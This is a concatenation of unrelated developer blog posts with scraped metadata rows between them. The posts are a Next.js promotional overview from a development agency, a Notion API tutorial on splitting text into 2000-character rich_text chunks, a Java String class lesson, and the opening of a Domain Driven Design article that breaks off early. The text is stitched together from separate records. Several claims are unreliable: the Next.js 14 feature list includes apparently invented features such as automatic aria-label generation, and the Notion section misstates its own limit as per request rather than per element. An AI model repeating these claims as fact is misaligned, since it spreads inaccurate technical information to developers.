Within our realm as providers of Next.js development services, we view this flexibility as a cornerstone in navigating the swiftly evolving digital sphere. It affords us the agility to swiftly iterate and experiment with our concepts, enabling us to promptly respond to market demands and technological advancements. In essence, it allows us to stay ahead of the curve and maintain a competitive edge.
Moreover, the current landscape of consumer behavior has undergone a seismic shift, presenting new challenges and opportunities. With the rise of e-commerce and changing consumer habits, the need for adaptable and innovative solutions has become more pressing than ever before.
We have also become much more demanding when it comes to page loading speed (measured in milliseconds!) and the overall user experience of websites and web shops.
React allows you to build both simple and complex web applications faster and more easily, and thanks to the many great frameworks that have grown on top of it, you can now build blazingly fast websites that achieve much better UX and SEO efficiency.
Let’s have a look at one of those frameworks — Next.js, which enjoys growing popularity and quickly became the first choice for many big names and companies.
**WHAT IS NEXT.JS?**
Next.js is a JavaScript framework that enables you to build superfast and extremely user-friendly static websites, as well as web applications using React.
In fact, thanks to [**Automatic Static Optimization**](https://nextjs.org/docs/pages/building-your-application/rendering/automatic-static-optimization), “static” and “dynamic” become one now.
This feature allows Next.js to build hybrid applications that contain both server-side rendered and statically generated pages.
In other words,
> Statically generated pages are still reactive: Next.js will hydrate your application client-side to give it full interactivity.
This opens up many advantages, such as:
- **Rich User Experience** (easier and faster)
- **Great performance** (also easier and faster)
- **Rapid feature development**
Next.js is widely used by the biggest and most popular companies all over the world, like Netflix, Uber, Starbucks, and Twitch. It's also considered one of the fastest-growing React frameworks, perfect for working with static sites, which have lately been one of the hottest topics in the web development world.
**What is Next.js — A 2024 Perspective**
In recent years, Next.js has witnessed a huge rise in popularity.

According to the Stack Overflow survey of 2023, it ascended from the 11th to the 6th most popular framework among web developers. This rapid growth underscores its increasing acceptance and effectiveness in the developer community.

Over the years, Next.js has continually evolved, introducing features that address the ever-changing environment of web development. Its updates have consistently focused on improving performance and developer experience, and on providing robust SEO capabilities.
**Next.js 14 — A Leap Forward**
Next.js 14, introduced by Lee Robinson and Tim Neutkens, marked a significant advancement in the framework’s capabilities, building upon the foundations laid by Next.js 13:
- **Turbopack**: Replaces Webpack for faster builds, offering significantly quicker server start-up and refresh rates. These changes lead to higher developer productivity and faster iteration cycles, crucial for large-scale applications.
- **Server Actions (Stable)**: Streamlines server-side logic, allowing functions to run securely on the server. This simplifies data mutation workflows and strengthens application security, particularly vital for handling sensitive data and complex state management scenarios.
- **Partial Prerendering (Preview)**: Merges the benefits of SSR, SSG, and ISR, enabling rapid initial static loading with dynamic content streaming. This is key for applications requiring both fast loading times and dynamic content rendering.
- **Metadata Improvements**: Automates the inclusion of essential metadata in the initial page load, ensuring a seamless user experience across devices and themes. It’s especially important for responsive design and accessibility.
> Next.js 14 brought some game-changing features. Turbopack, for instance, has significantly sped up server startup and code refresh times. Then there’s Server Actions, making mutations more efficient and integrated. And let’s not forget Partial Prerendering, which is still in preview but looks promising for dynamic content handling.
The features introduced in Next.js 14 represent significant advancements in the capabilities of the framework, catering to various aspects of web development and addressing key challenges faced by developers. Let’s delve into each of these features and explore their benefits in more detail:
**React Server Components (RSC):**
- Performance Optimization: By rendering components server-side and accessing the backend directly, RSC reduces the client-side bundle size and enhances performance.

- Improved Initial Load Times: With reduced initial load times, RSC contributes to a smoother user experience, especially for applications with extensive client-side rendering requirements.
- SEO Benefits: Server-side rendering improves SEO capabilities by providing search engine crawlers with pre-rendered HTML content, enhancing discoverability and search ranking.
**Middleware:**
- Granular Control: Middleware empowers developers with fine-grained control over the request-response lifecycle, facilitating advanced server-side logic such as A/B testing and request manipulation.

- Customized User Experience: With the ability to manipulate requests and responses at various stages, developers can tailor the user experience based on specific criteria, enhancing personalization and engagement.
- Efficient Implementation of Complex Logic: Middleware streamlines the implementation of complex server-side logic, enabling developers to manage application behavior more efficiently and effectively.
**Edge Functions:**
- Minimized Latency: By executing server-side code at the network’s edge, Edge Functions minimize latency and offer a serverless experience, ensuring optimal performance for users across diverse geographical locations.
- High Performance: Applications requiring high performance and low response times benefit significantly from Edge Functions, delivering faster and more responsive user experiences.
- Global Scalability: Edge Functions enable global scalability by distributing server-side logic closer to end-users, reducing the impact of geographical distance on application performance.
**App Router:**
- Advanced Routing Features: The revamped routing system in Next.js, including support for nested routes and layouts, offers developers more flexibility and power in structuring applications.
- Scalability and Maintainability: For large-scale and complex web projects, App Router provides a structured approach to managing routing logic, enhancing scalability and maintainability.
- Improved Developer Productivity: With a more intuitive and feature-rich routing system, developers can streamline development workflows and accelerate the implementation of routing-related features.
Overall, the features introduced in Next.js 14 represent a significant leap forward in empowering developers to build high-performance, scalable, and feature-rich web applications. Whether it’s optimizing performance, customizing user experiences, reducing latency, or enhancing routing capabilities, Next.js 14 offers a comprehensive toolkit for tackling the challenges of modern web development effectively.
**NEXT.JS AND JAMSTACK**
Next.js is now one of the most popular React frameworks for building superfast and super SEO-friendly [Jamstack websites](https://pagepro.co/services/jamstack-development). It can be perfectly combined with headless CMSes or eCommerce platforms to drive extraordinary performance and SEO results.
**WHAT CAN YOU BUILD WITH NEXT.JS?**

With Next.js you can build a number of digital products and interfaces such as:
- Web Platform
- Jamstack websites
- MVP (Minimum Viable Product)
- Static websites
- Single web pages
- SaaS products
- eCommerce and retail websites
- Dashboards
- Complex and demanding web applications
- Interactive user interfaces
And we love to use it in various projects since it gives us so many possibilities. Check out how it influenced the e-learning platform we were recently launching for our customer — Learn Squared:
**Our Choice: Why We Chose Next.js for Our Website**
At the heart of our decision to use Next.js for our website lies a combination of strategic factors and practical benefits.
**SEO Optimization** stands out as a primary reason — we work on SEO improvements daily, as organic is our main source of traffic. Next.js’s powerful SEO capabilities significantly boost organic traffic, a key metric for online visibility and success.
Equally crucial is **Page Speed** for us. This framework’s efficiency in loading times elevates the user experience and also, again, fortifies our SEO efforts.
In the realm of **Content Management**, using the Jamstack architecture with Next.js has afforded us exceptional flexibility, allowing our marketing team to harness tools like Storybook for dynamic content management.
This aligns perfectly with our approach to content strategy, ensuring that we can adapt and respond swiftly to market trends and user feedback.
Lastly, the **Developer Affinity** for Next.js within our team is noteworthy. Our developers prize its efficiency and scalability, making it a pleasure to work with, while the robust support community around Next.js provides an added layer of assurance and continuous learning.
By adopting Next.js for our own website, we provided final proof of its effectiveness and adaptability in the ever-evolving digital world. (Yes, we love it very much!)
**NEXT.JS AND USER EXPERIENCE**
User experience plays a key role in the success (or failure) of digital businesses.

For example, if you have an online shop and you don’t take care of UX properly, it will result in:
- Losing customers
- Abandoned carts
- High bounce rate
The design is also important — if you are using themes or templates, the chances are someone out there has a similar-looking layout. It also means that you can’t build a unique customer experience and change it over time. Even if this means changing one simple thing like adding a button to the product page or deleting one.
Luckily — thanks to Next.js — you can build a fully customized user experience. Let’s see what it really means.
- **UX Freedom**: Next.js allows developers to bypass the constraints of plugins, templates, or other limitations typically imposed by CMS platforms. Technically, this is facilitated by Next.js’s flexible file-system routing and its support for various CSS-in-JS libraries, enabling a high degree of customization in the frontend design.
- **Adaptability and Responsiveness**: The framework’s built-in features such as automatic image optimization and responsive loading contribute significantly to creating web applications that are adaptable to any screen size or resolution. This adaptability is bolstered by the framework’s seamless integration with modern CSS frameworks, boosting the responsive design capabilities.
- **Short Page Load Time**: Next.js’s capability for static site generation (SSG) and incremental static regeneration (ISR) plays a crucial role in achieving faster page load times. They enable serving pre-rendered pages to users, significantly reducing the time to first byte (TTFB) and improving the overall site speed.
- **Data Security**: In the context of static websites built with Next.js, the absence of a direct database connection reinforces security. This architectural choice minimizes the exposure of sensitive data and dependencies, making these sites inherently more secure against common web vulnerabilities.

All of these things mentioned above make the user experience as great as it can possibly be.
But the benefits of using Next.js don’t end there.
**NEXT.JS AND SEO**

Another big reason to choose Next.js is its SEO efficiency, and here’s why:
- **Server-Side Rendering (SSR)**: One of the most influential benefits of Next.js is its use of SSR. It ensures that the full content of your page is rendered on the server before it reaches the user’s browser. For search engines, this means they can crawl and index your site content more effectively, boosting your visibility in search results.
- **Static Site Generation (SSG)**: Next.js excels in generating static sites, which are faster and more reliable. Static sites load quicker, offering a better user experience, a factor that search engines, particularly Google, prioritize highly. This directly contributes to better SEO rankings.
- **Speed and Performance**: Next.js websites are known for their impressive speed, a direct result of static generation and optimized code. Fast-loading sites reduce bounce rates, keep users engaged longer, and are favoured by search engines, all contributing to higher SEO rankings.
- **Organic Traffic and High-Intent Keywords**: By optimizing for speed and user experience, Next.js helps in growing organic traffic faster. Its ability to rank high-intent keywords higher than competitors makes it a preferred choice for businesses aiming to be more visible to potential customers.
- **Competitive Edge**: The SEO efficiency of Next.js gives websites a significant advantage over competitors. Its capabilities in speed, performance, and content visibility help sites outperform others in search engine results.
Whether you rely on server-side rendering or static generation, it will help you a lot with:
- **Growing organic traffic faster**
- **Ranking your high-intent keywords higher**
- **Outperforming competitors more easily**
- **Being more visible to potential customers**
Next.js websites are super-fast, easy to scan, and provide a great user experience and that’s why Google will favour them above others and rank them higher.
**PROS AND CONS OF NEXT.JS**
As with any other framework, some great options come with a price. Let’s have a look at the most popular pros and cons of using Next.js.

**Main Advantages of Next.js for CTOs**
**Rich Ecosystem**: Next.js benefits from the widespread adoption of JavaScript and strong backing from industry giants like Vercel and Meta. This robust ecosystem offers a rich talent pool and ease of learning, making Next.js a strategic, future-proof choice for tech leaders.
**Future-Proof Technology**: With regular updates and support from a vibrant community and industry leaders, Next.js represents a future-proof solution in web development. Additionally, its alignment with the latest web standards makes it a strategic asset for long-term business goals and technology roadmaps.
**Easy Scalability**: Next.js supports scalability through features like automatic code splitting, flexible rendering options, and optimized image handling. These features ensure efficient resource utilization and performance under high traffic, crucial for rapidly growing businesses.
**High Security**: Offering robust tools for building secure web applications, Next.js addresses critical areas like authentication and data validation. This focus on security is vital for maintaining user trust and data integrity in the face of a growing number of cyber threats.
**Performance Optimization**: Key features like lazy loading, image optimization, code splitting, and route prefetching in Next.js positively influence site performance. And these are essential for high user engagement and efficient resource utilization, impacting the success and growth of web applications.
**SEO Optimization**: As we mentioned a few times above, Next.js boosts SEO through server-side rendering, static generation, and incremental static regeneration. It ensures that content is fully accessible to search engine crawlers, supporting site visibility and user traffic.
**Benefits of Next.js for online businesses**
How Next.js can positively impact your business results and help you push your ideas further?
**Faster time to market**: the many ready-to-use components and the compatibility that come with it make building an MVP much faster. Thanks to this, you can get feedback from real users quickly and make the proper changes without wasting time and budget.
**Better User Experience**: you have total freedom to create a front-end that fully aligns with your business goals and design vision. Thanks to it, the user experience is great and unique.
**Increased organic traffic**: Google loves static sites as they are fast, light, and easy to scan. This translates into higher positions of these websites in search results.
**Fully omnichannel**: Next.js websites and web apps work on any device, so they are accessible to everyone.
**Support on demand**: since Next.js is a React-based framework, it won’t be difficult to find another [frontend developer](https://pagepro.co/services/frontend-development) without a need to build everything from scratch once again.
**Increased conversion rate**: fast loading speed, better user experience, and high accessibility translate into higher conversion. If users are happy with the customer experience they get, they are more likely to buy and to come back later for more.
**Community support**: as Next.js is becoming the number one framework for many big brands, it's becoming more popular, and naturally, so is the number of its contributors. That means that even if you face an issue, there will probably already be a solution for it.
**Pros of Next.js for developers**
Regardless of whether you are looking for benefits from a business perspective or a technical one, you will find some reasons to seriously consider choosing Next.js.

If you want to build a complex and demanding application, the React-based nature of Next.js allows you to save a lot of time. Developers especially favour features like:
- **Zero Config** — Next allows you to focus on the business logic of your application instead of the application logic. And to help you, it provides automatic compilation and bundling. In other words, Next is optimized for production right from the start.
- **Incremental Static Regeneration** — it allows you to update the pages by re-rendering them in the background as traffic comes in. So in other words, static content can become dynamic.
- **A hybrid of server-side rendering SSR and static site generation SSG** — prerender pages at build time or request time in a single project.
- **TypeScript support** — automatic TypeScript configuration and compilation.
- **Fast Refresh** — fast, live-editing experience: edits made to React components are live within seconds. It works analogously to Hot Module Replacement (HMR).
- **CSS parsers** — the possibility to import CSS files from a JavaScript file. New parsers have improved the handling of CSS.
- **Built-in Image Component and Automatic Image Optimization** — this feature automatically optimizes images.
- **Automatic code splitting** — automatically reduces the size of the page by splitting the code and serving components only when needed. Modules can be automatically imported too, thanks to the dynamic import option.
- **Data fetching** — this option allows rendering the content in different ways, according to the app’s use case. It can be done by pre-rendering with server-side rendering (SSR) or static site generation (SSG), and by updating or creating content with ISR.
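Of these, Incremental Static Regeneration is the least intuitive. The following plain-JavaScript sketch is a conceptual model only, not Next.js source code (the function names are invented): it mimics the stale-while-revalidate behavior in which a page older than its `revalidate` window is served stale once while a fresh copy is rebuilt.

```javascript
// Conceptual model of ISR: serve cached HTML, and once it is older than
// `revalidateSeconds`, serve the stale copy one more time while rebuilding.
function createIsrCache(render, revalidateSeconds, now = () => Date.now()) {
  let cached = null;
  return function get() {
    if (!cached) {
      // First request: build synchronously (Next.js can also prebuild at deploy).
      cached = { html: render(), builtAt: now() };
      return { html: cached.html, stale: false };
    }
    const ageSeconds = (now() - cached.builtAt) / 1000;
    if (ageSeconds <= revalidateSeconds) {
      return { html: cached.html, stale: false }; // fresh enough: serve as-is
    }
    const staleHtml = cached.html;                // too old: serve stale copy...
    cached = { html: render(), builtAt: now() };  // ...and regenerate in place
    return { html: staleHtml, stale: true };
  };
}

let version = 0;
let fakeTime = 0;
const getPage = createIsrCache(() => `<p>v${++version}</p>`, 60, () => fakeTime);

console.log(getPage()); // { html: '<p>v1</p>', stale: false }
fakeTime = 120_000;     // 120s later, past the 60s revalidate window
console.log(getPage()); // { html: '<p>v1</p>', stale: true } (rebuild happens)
console.log(getPage()); // { html: '<p>v2</p>', stale: false }
```

The injected clock (`now`) is only there to make the behavior easy to demonstrate; real ISR uses wall-clock time and performs the regeneration in the background.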
**Release of Next.js 14: even more promising future**
The list of Next.js benefits is growing with every release. In October 2023, Next.js 14 was introduced, together with a bunch of new features. The most important among them are:

1. **Improved Image Component**: Next.js 14 introduces enhancements to the Image component, making it even more efficient and versatile for handling images in web applications. With optimizations for performance and accessibility, developers can seamlessly integrate high-quality images while maintaining a fast and responsive user experience.
2. **Incremental Static Regeneration (ISR) Enhancements**: Building upon the ISR feature introduced in previous versions, Next.js 14 further refines and expands its capabilities. With improved support for dynamic data fetching and caching strategies, developers can leverage ISR to generate and update static pages with minimal effort, ensuring up-to-date content delivery while maximizing performance.
3. **Enhanced TypeScript Support**: Next.js continues to prioritize TypeScript support, with version 14 delivering even more robust typings and tooling for TypeScript users. This includes better integration with popular TypeScript libraries and improved error handling, enabling developers to write safer and more maintainable code with confidence.
4. **Streamlined API Routes**: Next.js 14 introduces optimizations to API routes, simplifying the process of building backend functionality within Next.js applications. With enhanced routing capabilities and improved middleware support, developers can create powerful APIs more efficiently, facilitating seamless communication between client-side and server-side logic.
5. **Advanced Internationalization (i18n) Support**: Next.js 14 expands its i18n capabilities with new features and enhancements tailored for building multilingual applications. With built-in support for locale-specific routing, content translation, and date formatting, developers can easily create immersive user experiences for global audiences while maintaining code simplicity and clarity.
6. **Optimized Build Performance**: Building upon previous optimizations, Next.js 14 introduces further improvements to build performance, reducing build times and enhancing developer productivity. Through enhancements to the build pipeline and caching mechanisms, developers can iterate more quickly and deploy changes with confidence, ensuring a smooth development experience from start to finish.
7. **Enhanced Developer Experience**: Next.js 14 focuses on enhancing the overall developer experience with improvements to tooling, documentation, and community resources. With updated documentation, interactive examples, and comprehensive guides, developers can onboard quickly and leverage Next.js effectively for their projects, regardless of experience level.
8. **Expanded Ecosystem Integrations**: Next.js 14 strengthens its integration with popular frameworks, libraries, and services within the JavaScript ecosystem. From seamless integration with React Suspense to enhanced compatibility with GraphQL APIs and headless CMS platforms, developers have access to a rich ecosystem of tools and resources to streamline development workflows and build cutting-edge web applications.
9. **Improved Accessibility**: Next.js 14 prioritizes accessibility by providing developers with tools and best practices to ensure that their applications are inclusive and usable by all users. With enhanced accessibility auditing tools, automatic aria-label generation, and built-in support for keyboard navigation, developers can create accessible web experiences with ease, meeting the highest standards of accessibility compliance.
10. **Future-ready Architecture**: Next.js 14 lays the foundation for future innovations in web development with a forward-thinking architecture and design principles. By embracing emerging technologies, standards, and best practices, Next.js empowers developers to build modern, scalable, and resilient web applications that are ready for the challenges of tomorrow.
Next.js 14 represents a significant milestone in the evolution of the framework, offering developers a comprehensive toolkit for building modern web applications with speed, efficiency, and confidence. With its rich feature set, robust performance optimizations, and commitment to developer experience, Next.js continues to solidify its position as a leading choice for JavaScript developers worldwide.
To learn more about the new Next.js, visit the [Next.js official website](https://nextjs.org/blog).
**Cons of using Next.js**
The number of Next.js benefits is huge and clearly outweighs its cons. However, let's write them down to be as objective as possible.
- **Development and management** — the flexibility, given by Next, has its cost — continuous management. To make all desired changes properly, you will need a dedicated person with proper knowledge. The good news is that this person doesn’t have to be a developer.
- **Ongoing cost** — since Next.js does not provide many built-in front pages, you have to create your own front-end, which will require changes from time to time. It means that you will have to pay a frontend developer to get the job done.
- **Lack of built-in state manager** — so if you need a state manager in your app, you have to add Redux, MobX or something else.
- **Low on plug-ins** — you cannot use many easy-to-adapt plugins.
**EXAMPLES OF NEXT.JS WEBSITES**
Here are just three of [the great examples of websites built in Next.js](https://pagepro.co/blog/nextjs-websites-examples/).
You can also check out [their official showcase](https://nextjs.org/showcase) for even more inspiration.

[https://ferrari.com](https://ferrari.com)

[https://m.twitch.tv](https://m.twitch.tv)

[https://nike.com/help](https://nike.com/help)
**SUMMARY**
It doesn’t matter if you are planning to build a huge and demanding app to serve millions of users, or if you are running a growing web shop on Shopify. In both cases, you can use the advantages of modern web technology to **make your business more efficient online.**
Uplift your page speed, SEO, and UX, and remember that technologies such as Next.js are making the web a better, cleaner, and more user-centric place. And that will always be favourable, not only to Google but, most importantly, to users.
| basimghouri |
1,878,579 | How to unlock the limitations of Notion | Notion rich_text limitations - node client Notion has undoubtedly gained popularity as a... | 27,625 | 2024-06-05T23:31:02 | https://www.johnatanortiz.tech/blog/how-to-unlock-the-limitations-of-notion | # Notion rich_text limitations - node client
Notion has undoubtedly gained popularity as a versatile productivity and organization platform. Its ability to create documents, databases, boards, and more, all in one place, has attracted a wide range of users, from students to business professionals. However, like any tool, Notion also has its limitations, especially when it comes to its API and handling rich_text.
### What is rich_text in Notion?
Before diving into the limitations, it's essential to understand what rich_text in Notion is exactly. In simple terms, rich_text refers to the rich text formatting that can be used within Notion. This includes styles such as bold, italic, strikethrough, numbered and bulleted lists, as well as links and mentions to other pages.
### What are the principal limitations?
One of the primary limitations of the Notion API is its restriction on the maximum number of characters that can be processed in a single request. Presently, the Notion API accepts a maximum of 2000 characters per request. This constraint poses a significant challenge for developers working with large bodies of text or intricate data structures within the Notion platform.
| Property value type | Inner property | Size limit |
| --- | --- | --- |
| [Rich text](https://developers.notion.com/reference/rich-text) | text.content | 2000 characters |
| [Rich text](https://developers.notion.com/reference/rich-text) | text.link.url | 2000 characters |
| [Rich text](https://developers.notion.com/reference/rich-text) | equation.expression | 1000 characters |
### Solutions for mitigating the Notion API limits
The most effective way to work within the Notion API's character restriction is to segment the content into chunks of 2000 characters or less. Each chunk is then sent as a separate rich_text element, so every piece stays within the per-element limit.
**Example:**
- This is the typical way a page would be added:
```js
const page = await notion.pages.create({
parent: { database_id: databaseId },
properties: {
nameOfColumn: {
rich_text: [
{
type: 'text',
text: {
content: 'This is a long text...'
}
}
]
},
}
});
```
- This is how to insert the page when the text exceeds the limit:
```ts
function splitTextIntoChunks(text: string, chunkSize: number) {
const chunks = [];
for (let i = 0; i < text.length; i += chunkSize) {
chunks.push(text.slice(i, i + chunkSize));
}
return chunks;
}
const chunks = splitTextIntoChunks('This is a long text...', 2000);
const page = await notion.pages.create({
parent: { database_id: databaseId },
properties: {
nameOfColumn: {
rich_text: chunks.map(chunk => ({
type: 'text',
text: {
content: chunk
}
}))
},
}
});
```
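As a quick sanity check of the chunking helper above, here it is in plain JavaScript, run outside any Notion call (the 4500-character string is just an illustration):

```javascript
function splitTextIntoChunks(text, chunkSize) {
  const chunks = [];
  for (let i = 0; i < text.length; i += chunkSize) {
    chunks.push(text.slice(i, i + chunkSize));
  }
  return chunks;
}

// A 4500-character string must be sent as three rich_text elements.
const chunks = splitTextIntoChunks('a'.repeat(4500), 2000);
console.log(chunks.length);             // 3
console.log(chunks.map(c => c.length)); // [ 2000, 2000, 500 ]
```

Every chunk is at most 2000 characters, so each one fits in a single rich_text element.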
Implementing this approach ensures efficient data transmission within the constraints of the Notion API, facilitating seamless integration and manipulation of content. | johnatan_stevenortizsal | |
1,878,578 | The String Class | A String object is immutable: Its content cannot be changed once the string is created. You know... | 0 | 2024-06-05T23:30:36 | https://dev.to/paulike/the-string-class-17o7 | java, programming, learning, beginners | A **String** object is immutable: Its content cannot be changed once the string is created. You know strings are objects. You can invoke the **charAt(index)** method to obtain a character at the specified index from a string, the **length()** method to return the size of a string, the **substring** method to return a substring in a string, and the **indexOf** and **lastIndexOf** methods to return the first or last index of a matching character or a substring. We will take a closer look at strings in this section.
The **String** class has 13 constructors and more than 40 methods for manipulating strings. Not only is it very useful in programming, but it is also a good example for learning classes and objects.
## Constructing a String
You can create a string object from a string literal or from an array of characters. To create a string from a string literal, use the syntax:
`String newString = new String(stringLiteral);`
The argument **stringLiteral** is a sequence of characters enclosed inside double quotes. The following statement creates a **String** object **message** for the string literal **"Welcome to Java"**:
`String message = new String("Welcome to Java");`
Java treats a string literal as a **String** object. Thus, the following statement is valid:
`String message = "Welcome to Java";`
You can also create a string from an array of characters. For example, the following statements create the string **"Good Day"**:
```java
char[] charArray = {'G', 'o', 'o', 'd', ' ', 'D', 'a', 'y'};
String message = new String(charArray);
```
A **String** variable holds a reference to a **String** object that stores a string value. Strictly speaking, the terms **String** _variable_, **String** _object_, and _string value_ are different, but most of the time the distinctions between them can be ignored. For simplicity, the term _string_ will often be used to refer to **String** variable, **String** object, and string value.
## Immutable Strings and Interned Strings
A **String** object is immutable; its contents cannot be changed. Does the following code change the contents of the string?
`String s = "Java";
s = "HTML";`
The answer is no. The first statement creates a **String** object with the content **"Java"** and assigns its reference to **s**. The second statement creates a new **String** object with the content **"HTML"** and assigns its reference to **s**. The first **String** object still exists after the assignment, but it can no longer be accessed, because variable **s** now points to the new object, as shown in Figure below.

Because strings are immutable and are ubiquitous in programming, the JVM uses a unique instance for string literals with the same character sequence in order to improve efficiency and save memory. Such an instance is called an _interned string_. For example, the following statements:
```java
String s1 = "Welcome to Java";
String s2 = new String("Welcome to Java");
String s3 = "Welcome to Java";
System.out.println("s1 == s2 is " + (s1 == s2));
System.out.println("s1 == s3 is " + (s1 == s3));
```

display
```
s1 == s2 is false
s1 == s3 is true
```
In the preceding statements, **s1** and **s3** refer to the same interned string—**"Welcome to Java"**—so **s1 == s3** is **true**. However, **s1 == s2** is **false**, because **s1** and **s2** are two different string objects, even though they have the same contents.
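You can observe interning directly. The `intern()` method returns the canonical instance from the string pool, so the following standalone demo (the class name `InternDemo` is arbitrary) confirms the comparisons above:

```java
public class InternDemo {
    public static void main(String[] args) {
        String s1 = "Welcome to Java";              // interned literal
        String s2 = new String("Welcome to Java");  // a new, distinct object
        String s3 = "Welcome to Java";              // same interned literal as s1

        System.out.println(s1 == s2);           // false: different objects
        System.out.println(s1 == s3);           // true: same interned string
        System.out.println(s1 == s2.intern());  // true: intern() yields the pooled instance
    }
}
```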
## Replacing and Splitting Strings
The **String** class provides the methods for replacing and splitting strings, as shown in Figure below.

Once a string is created, its contents cannot be changed. The methods **replace**, **replaceFirst**, and **replaceAll** return a new string derived from the original string (without changing the original string!). Several versions of the **replace** methods are provided to replace a character or a substring in the string with a new character or a new substring.
For example,
**"Welcome".replace('e', 'A')** returns a new string, **WAlcomA**.
**"Welcome".replaceFirst("e", "AB")** returns a new string, **WABlcome**.
**"Welcome".replace("e", "AB")** returns a new string, **WABlcomAB**.
**"Welcome".replace("el", "AB")** returns a new string, **WABcome**.
The **split** method can be used to extract tokens from a string with the specified delimiters. For example, the following code
```java
String[] tokens = "Java#HTML#Perl".split("#");
for (int i = 0; i < tokens.length; i++)
    System.out.print(tokens[i] + " ");
```
displays
`Java HTML Perl`
## Matching, Replacing and Splitting by Patterns
Often you will need to write code that validates user input, such as checking whether the input is a number, a string with all lowercase letters, or a Social Security number. How do you write this type of code? A simple and effective way to accomplish this task is to use a regular expression.
A _regular expression_ (abbreviated regex) is a string that describes a pattern for matching a set of strings. You can match, replace, or split a string by specifying a pattern. This is an extremely useful and powerful feature.
Let us begin with the **matches** method in the **String** class. At first glance, the **matches** method is very similar to the **equals** method. For example, the following two statements both evaluate to **true**.
`"Java".matches("Java");
"Java".equals("Java");`
However, the **matches** method is more powerful. It can match not only a fixed string, but also a set of strings that follow a pattern. For example, the following statements all evaluate to **true**:
`"Java is fun".matches("Java.*")
"Java is cool".matches("Java.*")
"Java is powerful".matches("Java.*")`
`Java.*` in the preceding statements is a regular expression. It describes a string pattern that begins with **Java** followed by _any_ zero or more characters. Here, `.*` matches any sequence of zero or more characters.
The following statement evaluates to **true**.
`"440-02-4534".matches("\\d{3}-\\d{2}-\\d{4}")`
Here **\\d** represents a single digit, and **\\d{3}** represents three digits.
The **replaceAll**, **replaceFirst**, and **split** methods can be used with a regular expression. For example, the following statement returns a new string that replaces **$**, **+**, or **#** in **a+b$#c** with the string **NNN**.
`String s = "a+b$#c".replaceAll("[$+#]", "NNN");
System.out.println(s);`
Here the regular expression **[$+#]** specifies a pattern that matches **$**, **+**, or **#**. So, the output is **aNNNbNNNNNNc**.
The following statement splits the string into an array of strings delimited by punctuation marks.
`String[] tokens = "Java,C?C#,C++".split("[.,:;?]");
for (int i = 0; i < tokens.length; i++)
System.out.println(tokens[i]);`
In this example, the regular expression **[.,:;?]** specifies a pattern that matches **.**, **,**, **:**, **;**, or **?**. Each of these characters is a delimiter for splitting the string. Thus, the string is split into **Java**, **C**, **C#**, and **C++**, which are stored in array **tokens**.
Regular expression patterns are complex for beginning students to understand. For this reason, simple patterns are introduced in this section.
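The matching, replacing, and splitting examples in this section can be verified with a small standalone program (the class name `RegexDemo` is arbitrary):

```java
public class RegexDemo {
    public static void main(String[] args) {
        // Java.* matches "Java" followed by zero or more characters
        System.out.println("Java is fun".matches("Java.*"));      // true

        // [$+#] matches any one of the characters $, +, or #
        System.out.println("a+b$#c".replaceAll("[$+#]", "NNN"));  // aNNNbNNNNNNc

        // split on any of the punctuation delimiters . , : ; ?
        String[] tokens = "Java,C?C#,C++".split("[.,:;?]");
        for (String token : tokens)
            System.out.println(token);  // Java, C, C#, C++ on separate lines
    }
}
```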
## Conversion between Strings and Arrays
Strings are not arrays, but a string can be converted into an array, and vice versa. To convert a string into an array of characters, use the **toCharArray** method. For example, the following statement converts the string **Java** to an array.
`char[] chars = "Java".toCharArray();`
Thus, **chars[0]** is **J**, **chars[1]** is **a**, **chars[2]** is **v**, and **chars[3]** is **a**.
You can also use the **getChars(int srcBegin, int srcEnd, char[] dst, int dstBegin)** method to copy a substring of the string from index **srcBegin** to index **srcEnd-1** into a character array **dst** starting from index **dstBegin**. For example, the following code copies the substring **"3720"** in **"CS3720"** from index **2** to index **6-1** into the character array **dst** starting from index **4**.
```java
char[] dst = {'J', 'A', 'V', 'A', '1', '3', '0', '1'};
"CS3720".getChars(2, 6, dst, 4);
```
Thus, **dst** becomes **{'J', 'A', 'V', 'A', '3', '7', '2', '0'}**.
To convert an array of characters into a string, use the **String(char[])** constructor or the **valueOf(char[])** method. For example, the following statement constructs a string from an array using the **String** constructor.
`String str = new String(new char[]{'J', 'a', 'v', 'a'});`
The next statement constructs a string from an array using the **valueOf** method.
`String str = String.valueOf(new char[]{'J', 'a', 'v', 'a'});`
## Converting Characters and Numeric Values to Strings
Recall that you can use **Double.parseDouble(str)** or **Integer.parseInt(str)** to convert a string to a **double** value or an **int** value and you can convert a character or a number into a string by using the string concatenating operator. Another way of converting a number into a string is to use the overloaded static **valueOf** method. This method can also be used to convert a character or an array of characters into a string, as shown in Figure below.

For example, to convert a **double** value **5.44** to a string, use **String.valueOf(5.44)**. The return value is a string consisting of the characters **'5'**, **'.'**, **'4'**, and **'4'**.
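A short standalone snippet (the class name `ValueOfDemo` is arbitrary) confirming the conversions described in the last two sections:

```java
public class ValueOfDemo {
    public static void main(String[] args) {
        String s = String.valueOf(5.44);                           // "5.44"
        String t = String.valueOf(new char[]{'J', 'a', 'v', 'a'}); // "Java"
        char[] chars = "Java".toCharArray();                       // {'J', 'a', 'v', 'a'}

        System.out.println(s);         // 5.44
        System.out.println(t);         // Java
        System.out.println(chars[0]);  // J
    }
}
```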
## Formatting Strings
The **String** class contains the static **format** method to return a formatted string. The syntax to invoke this method is:
`String.format(format, item1, item2, ..., itemk)`
This method is similar to the **printf** method except that the **format** method returns a formatted string, whereas the **printf** method displays a formatted string. For example,
```java
String s = String.format("%7.2f%6d%-4s", 45.556, 14, "AB");
System.out.println(s);
```
displays
xx45.56xxxx14ABxx
Note that
`System.out.printf(format, item1, item2, ..., itemk);`
is equivalent to
```java
System.out.print(
    String.format(format, item1, item2, ..., itemk));
```
where each x denotes a blank space. | paulike |
1,872,855 | Domain Driven Design (DDD) Practice: Live Streaming App Example | Domain Driven Design (DDD) Practice: Live Streaming App Example Introduction In... | 0 | 2024-06-05T23:29:38 | https://dev.to/ma2mori/domain-driven-design-ddd-practice-live-streaming-app-example-3dih | ddd, php | ### Domain Driven Design (DDD) Practice: Live Streaming App Example
#### Introduction
In a [previous article](https://dev.to/ma2mori/introduction-to-domain-driven-design-ddd-basic-concepts-and-rudiments-of-practice-5042), we learned the basic concepts of Domain Driven Design (DDD). In this article, we introduce a concrete practical example using a “live-streaming application” as the subject.
### Overview of a live-streaming application
A live-streaming app is a platform where users distribute content in real-time and other users watch it. It has the following features:
- Viewing users can also be delivery users
- Viewers can provide feedback to the distributor in the form of free and paid reactions
Therefore, the main modeling considerations are:
- User management
- Distribution Management
- Reaction management
In practice, we will work with domain experts to work out the details.
### Domain Modeling
